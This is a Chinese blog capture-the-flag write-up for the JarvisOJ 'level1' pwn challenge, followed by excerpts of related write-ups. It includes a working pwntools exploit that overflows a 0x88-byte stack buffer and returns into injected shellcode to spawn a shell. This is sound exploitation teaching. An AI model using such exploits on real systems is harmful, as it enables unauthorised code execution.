PWN_JarvisOJ_Level1

最新推荐文章于 2023-08-20 20:27:09 发布
最新推荐文章于 2023-08-20 20:27:09 发布
阅读量827 收藏 2
点赞数
分类专栏: PWN学习 文章标签: PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/michaelinfinity/article/details/88541562
版权

首先nc一下

之后我们来看ida反编译

在“Hello,World!\n”之前有一个vulnerable_function,进去之后查看一下这个函数

可以看出来刚刚出现的奇怪的地址是buf的首地址(%p是返回参数地址的),那么我们就要查看一下buf。

从中能看出buf有0x88的字节,并且返回指令在+0004的位置,所以需要填充0x88+4的字节

这个题目中没有system函数,所以需要自己写shellcode,首先把代码提供出来


from pwn import *

p=remote('pwn2.jarvisoj.com',9877)
context(arch='i386',os='linux',log_level='debug')
shellcode=''
shellcode+=asm(shellcraft.sh())

add_str=p.recvline()[14:22]
add_str=int(add_str,16)

pwn_str=shellcode+(0x88+4-len(shellcode))*'A'+p32(add_str)

p.send(pwn_str)
p.interactive()

首先,pwntools的基本用法在这里就不多加赘述了。

我们首先看p.recvline()[14:22]这个部分。

其他人可能见过会有人写recvline[14:-2]的这个样式,这个是一样的效果,[]是Python的索引,其中:前面的部分是开始获取的位置,后面的部分是之后获取的位置。既然说了是索引了那么其他的大家就好好看看python的语法吧,我也是好顿翻了一遍才知道的。

int(add_str,16)是为了调成16进制。之后只要乖乖写payload就好了。

便能够取得flag了!!!!

Jarvis OJ level1
Kni9hT's Blog
11-08 643
要点:使用shellcraft.i386()来编写shellcode 和level0相比,本题没有system函数可以直接调用。 所以我们要发送shellcode来getshell 首先看一下开了哪些保护。(好吧,不出意料是全裸) 然后IDA里面看函数调用,main()函数先调用了vulnerable_function函数。 vulnerable_function: text:0804847B ...
BUUCTF Pwn jarvisoj_level21解题步骤
最新发布
2301_81505831的博客
02-04 387
这里需要注意的是,由于我们是直接调用system()而不是使用call指令,因此计算机会将调用函数前栈顶指针指向的地址视为函数的返回地址,因此我们需要在这个地方随便填入一些值。从反汇编后的代码可以看出read()这个函数对buf进行写入时存在缓冲区溢出。查看之后发现是32位的ELF文件,RELRO和NX保护不影响我们做题。buf到ebp的距离是0x88,ebp到Return的距离是0xF。system的地址可以在plt中找到,双击system.plt。然后在输入shift+F12,可以查找。
jarvisoj pwn level1
Joey_l的博客
07-31 461
https://www.jarvisoj.com/challenges 拿到程序后先file可知为32位和动态链接 file level1 然后checksec检查保护机制 checksec level1 拖入ida查看,在vulnerable_function()函数的printf()处存在注入点 栈结构: 低地址→高地址 buf→ebp→eip(返回地址) 思路:没有s...
jarvisoj_level1
、moddemod
07-06 404
这题我写这个exp是在ubuntu18的环境下写的,远程和本地的IO交互的数据不太一样,下面的exp在远程可以拿到shell,本地可能需要修改一下… exp from pwn import * from LibcSearcher import * context.log_level = 'debug' proc_name = './level1' p = process(proc_name) # p = remote('node3.buuoj.cn', 29850) elf = ELF(proc_na.
铁人三项_第五赛区_2018_rop
z1r0的博客
12-05 201
铁人三项_第五赛区_2018_rop 查看保护 溢出,ret2libc from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 27080) else: r = process(file_name) elf = ELF(file_name) def dbg(
BUUCTF_jarvisoj_level1
qq_39869547的博客
02-06 1064
和原题的差别在于,远程不回显栈地址。直接常规栈溢出即可 #!/usr/bin/env python # -*- coding: utf-8 -*- from pwn import * from LibcSearcher import * elf = ELF("./level1") shellcode = asm(shellcraft.sh()) io = remote("node3.buuoj.c...
[BUUCTF]PWN-jarvisoj_level4
红凳子的博客
04-07 600
[BUUCTF]PWN-jarvisoj_level4前言一、程序分析二、漏洞利用方法一:使用LibcSearcher寻找libc版本方法二:使用DynELF函数进行泄露 前言 在这篇文章中将学习到劫持read函数、使用LibcSearcher寻找libc版本和DynELF函数的使用 提示:以下是本篇文章正文内容,下面案例可供参考 一、程序分析 从中可以看出,32位程序,i386架构,开启了NX保护。 输入点在vulnerable_function里,read试图向长度0x88的地址空间写入0x10
【BUUCTF - PWNjarvisoj_level0
古月浪子的博客
04-05 772
checksec一下,栈溢出 IDA打开看看,很明显的溢出和后门函数,一道白给题 from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_level='debug' sl=lambda x:io.sendline(x) rl=lambda :io.rec...
BUUCTF jarvisoj_level2 题解
qq_51802916的博客
08-20 574
可以看到程序中已经有了shell的字符串,由于是32位程序,函数的参数通过压栈传递,因此我们可以直接将其地址放在system之后就能够完成参数的传递。而不是使用call指令,因此计算机会将调用函数前栈顶指针指向的地址视为函数的返回地址,因此我们需要在这个地方随便填入一些值,然后在后面填入函数的第一个参数。,因此我们需要填充0x88个字符就能到达ebp的位置,然后再填充4个字符就能到达eip的位置,并且。可以看到是32位程序,栈上开启了不可执行保护,但是没有栈检测标志,推测需要进行缓冲区溢出。
[BUUCTF]PWN——jarvisoj_level1
mcmuyanga的博客
11-09 1860
jarvisoj_level1 附件 步骤: 例行检查,32位程序,没有开任何保护 本地运行一下程序,看看大概的情况,可以看到输出了一个地址 32位ida载入,习惯性的检索程序里的字符串,没有发现可以直接利用的gates, main函数开始看程序 function函数 参数buf存在明显的溢出漏洞,程序还将buf参数的地址给了我们 由于没有开启nx,所以我们可以先通过read读入shellcode,然后利用溢出漏洞将ret覆盖为buf参数地址(此时buf里是shellcode)去执行即可
Jarvis OJ 之 level1
weixin_43464124的博客
04-22 312
首先介绍一下pwntools的一个用法吧算是。 from pwn import* shellcraft.sh() 然后,pwntools这个只能工具就会帮你写出一串shellcode来。 大致是这样的: u" /* execve(path='/bin///sh', argv=['sh'], envp=0) */\n /* push '/bin///sh\\x00' */\n p...
JarvisOJ-PWN-Level1
杀生丸?不,其实我要的是桔梗
03-16 914
JarvisOJ-PWN-Level 先checksec一下: 发现NX栈保护没有打开,也就是堆栈代码没有进行保护,那么就就题目很可能就是要输入shellcode在栈里执行吧。 打开IDA分析(32位): 主函数: vulner..fuction()函数: 题目的逻辑是打出buf的首地址然后写入从标准输入100字节给buf。 然后输出Holle world。 我们再看b...
(Jarvis Oj)(Pwn) level1
Nothing
04-18 1340
(Jarvis Oj)(Pwn) level1 首先用checksec查一下保护。几乎没开什么保护措施。关键的是NX没开,意味着栈上的数据可执行。 用ida反汇编,找到溢出点。 但这次没有找到system函数了,那么该怎么得到shell呢,发现这个函数调用了printf函数,输出了buf的地址,在结合NX保护是关闭的,那么就意味着,如果将shellcode写到buf中,函数返回时跳转...
jarvisoj——[XMAN]level1
王嘟嘟的博客
07-15 471
题目 Wp 先查一下基本的内容 可以看到 RELRO: Partial RELRO就是got表可写的意思,然后ida接着看看源码,这里就是说调用了一个无参的函数 这里看到很明显的是一个溢出,但是这里没有shellcode,就需要自己写一个了 这里可以看到print打印了buf的地址 这里写一个pwntools的脚本 from pwn import * sh = remote("pwn2.jarvisoj.com",9877) shellcode = asm(shellcraft.i386.
Jarvis OJ level1
九层台
07-06 823
liu@liu-F117-F:~/桌面/oj/level1$ checksec level1 [*] '/home/liu/\xe6\xa1\x8c\xe9\x9d\xa2/oj/level1/level1' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: ...
jarvis oj level1
发蝴蝶和大脑斧的博客
12-01 396
还是先checksec Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x8048000) RWX: Has RWX segments 发现数据部分可以执行,先看ida,同样是vulnerable处有栈溢...
jarvisoj-level1
qq_35661990的博客
11-08 358
先看一下有什么保护 什么保护都没开起来。 放进IDA里看一下 vulnerable_function(); write(1, "Hello, World!\n", 0xEu); return 0; main函数里就三行,进入vulnerable_function()函数看一下 char buf; // [esp+0h] [ebp-88h] printf("W...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值